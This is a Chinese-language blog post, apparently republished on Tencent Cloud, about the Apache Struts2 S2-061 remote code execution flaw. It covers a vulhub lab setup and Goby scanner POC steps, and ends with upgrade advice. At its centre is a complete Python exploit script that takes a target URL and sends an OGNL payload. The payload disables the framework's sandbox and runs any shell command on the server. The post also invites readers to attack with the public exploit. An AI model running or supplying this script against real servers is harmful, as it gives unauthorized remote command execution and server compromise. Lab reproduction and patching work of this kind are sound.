首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Struts2-061自动化脚本的编写与Goby POC编写

Struts2-061自动化脚本的编写与Goby POC编写

作者头像
洛米唯熊
发布2022-02-28 14:02:40
1.2K0
发布2022-02-28 14:02:40
举报
文章被收录于专栏:洛米唯熊洛米唯熊

0x00:前言与简介

一、S2-061是对S2-059沙盒进行的绕过漏洞

二、“黑客”就通过构造恶意的 OGNL 表达式,引发 OGNL 表达式二次解析,最终造成远程代码执行的影响.

http://mpvideo.qpic.cn/0bf2imcisaae5yainvwterpviq6drfbqjcia.f10004.mp4?dis_k=ba33b2d0b7208eabba5058756ec6547a&dis_t=1646027851&vid=wxv_1649829526232694786&format_id=10004&support_redirect=0&mmversion=false

0x01:影响版本

Apache:Struts2 : 2.0.0 - 2.5.25

0x02:环境的搭建

采用的环境项目地址:

https://github.com/vulhub/vulhub/tree/master/struts2/s2-061

利用Docker进行快速的搭建

利用Burp请求验证漏洞

EXP源自网络:

https://github.com/vulhub/vulhub/tree/master/struts2/s2-061

漏洞验证完毕

变更请求方法

验证成功

0x03:Python 脚本的编写

构造一个requests的Get请求即可,最后在利用正则筛选出命令执行的结果.

完整代码如下

#!/usr/bin/python3
 #author:Jaky
 #微信公众号:洛米唯熊

import requests,sys,re


if len(sys.argv)<3:
        print("[+]Use: pyhton3 s2-061.py http://ip:port command")
        print("[+]Explain: 洛米唯熊")
        print("[+]============================================================")
        sys.exit()

def Jaky():
    payload="%25%7b(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application%5b%27org.apache.tomcat.InstanceManager%27%5d).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr%5b%27struts.valueStack%27%5d).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d%7b%27"+sys.argv[2]+"%27%7d).(%23res%3d%23exec.exec(%23cmd))%7d"  
    url=sys.argv[1]+"/index.action?id="+payload
    r=requests.get(url).text
    z=re.findall("a id=.*",r)
    print (str(z).replace("a id=\"",""))

if __name__ == '__main__':
Jaky()

效果图

0x04:Goby POC编写

一、Goby自带的poc开发界面

二、填写相应的信息

三、在测试界面填写入上面的Get成功的payload

响应测试填写入的是响应包,我们需要的是得到什么信息。我这里测试的命令是“ID”.所以我利用正则的匹配获取UID的信息。

四、环境测试

五、做扫描测试

六、接下来就可以利用公开的exp进行攻击了

(未授权网站禁止攻击,后果自负)

0x05:修复方案

及时更新Apache Struts框架版本:

https://struts.apache.org/download.cgi#struts2526
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-12-14,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 洛米唯熊 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档